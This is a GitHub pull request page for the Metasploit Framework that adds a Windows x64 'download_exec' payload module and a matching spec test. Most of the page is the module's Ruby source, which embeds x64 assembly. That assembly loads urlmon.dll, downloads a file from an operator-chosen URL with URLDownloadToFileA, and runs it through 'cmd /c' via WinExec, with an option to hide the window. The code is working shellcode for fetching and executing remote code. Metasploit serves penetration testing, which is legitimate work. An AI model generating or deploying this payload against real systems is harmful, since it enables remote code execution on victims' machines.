Skip to content

Port payload/windows/download_exec to x64 #20386

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 8 commits into from
Aug 13, 2025
Merged

Port payload/windows/download_exec to x64 #20386

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
a412070
Create download_exec.rb
xHector1337 Jul 15, 2025
0344591
fix 5th arg for URLDownloadToFileA
xHector1337 Jul 16, 2025
90d15cb
finalize the payload
xHector1337 Jul 17, 2025
708dcaf
Delete unnecessary comments
xHector1337 Jul 17, 2025
af0fe9e
run rubocop -A
xHector1337 Aug 11, 2025
b6d9172
chore(rubocop): remove extra white-space
dledda-r7 Aug 12, 2025
abe932c
Update payloads_spec.rb
xHector1337 Aug 12, 2025
3122426
Update modules/payloads/singles/windows/x64/download_exec.rb
dledda-r7 Aug 12, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
126 changes: 126 additions & 0 deletions modules/payloads/singles/windows/x64/download_exec.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,126 @@
# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
CachedSize = 353

include Msf::Payload::Single
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi_x64

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Download Execute',
'Description' => 'Downloads and executes the file from the specified url.',
'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64
)
)

display_options = %w[HIDE SHOW]

register_options(
[
OptString.new('URL', [true, 'The url to download the file from.', 'http://localhost/hi.exe']),
OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.exe']),
OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
]
)
end

def generate(_opts = {})
url = datastore['URL'] || 'http://localhost/hi.exe'
file = datastore['FILEPATH'] || 'fox.exe'
display = datastore['DISPLAY'] || 'HIDE'

payload = %^
cld
and rsp, -16
call main
#{asm_block_api}

main:
pop rbp
call LoadLibrary
db "urlmon.dllK"

LoadLibrary:
pop rcx ; rcx points to the dll name.
xor byte [rcx+10], 'K' ; null terminator
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA("urlmon.dll")
; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.

SetUrl:
call SetFile
db "#{url}A"

SetFile:
pop rdx ; 2nd argument
xor byte [rdx+#{url.length}], 'A' ; null terminator
call UrlDownloadToFile
db "#{file}C"

UrlDownloadToFile:
pop r8 ; 3rd argument
xor byte [r8+#{file.length}], 'C' ; null terminator
xor rcx,rcx ; 1st argument
xor r9,r9 ; 4th argument
sub rsp, 8
push rcx ; 5th argument
mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
call rbp

SetCommand:
call Exec
db "cmd /c #{file}F"

Exec:
pop rcx ; 1st argument
xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')}
xor rdx, rdx ; 2nd argument
^

if display == 'HIDE'
hide = %(
call rbp
)
payload << hide

elsif display == 'SHOW'
show = %(
inc rdx ; SW_NORMAL = 1
call rbp
)
payload << show
end

if datastore['EXITFUNC'] == 'process'
exit_asm = %(
xor rcx,rcx
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
call rbp
)
payload << exit_asm

elsif datastore['EXITFUNC'] == 'thread'
exit_asm = %(
xor rcx,rcx
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
call rbp
)
payload << exit_asm
end

Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
end
end
9 changes: 9 additions & 0 deletions spec/modules/payloads_spec.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -5200,6 +5200,15 @@
reference_name: 'windows/aarch64/exec'
end

context 'windows/x64/download_exec' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/windows/x64/download_exec'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/download_exec'
end

context 'windows/x64/custom/bind_ipv6_tcp' do
it_should_behave_like 'payload is not cached',
Expand Down
Loading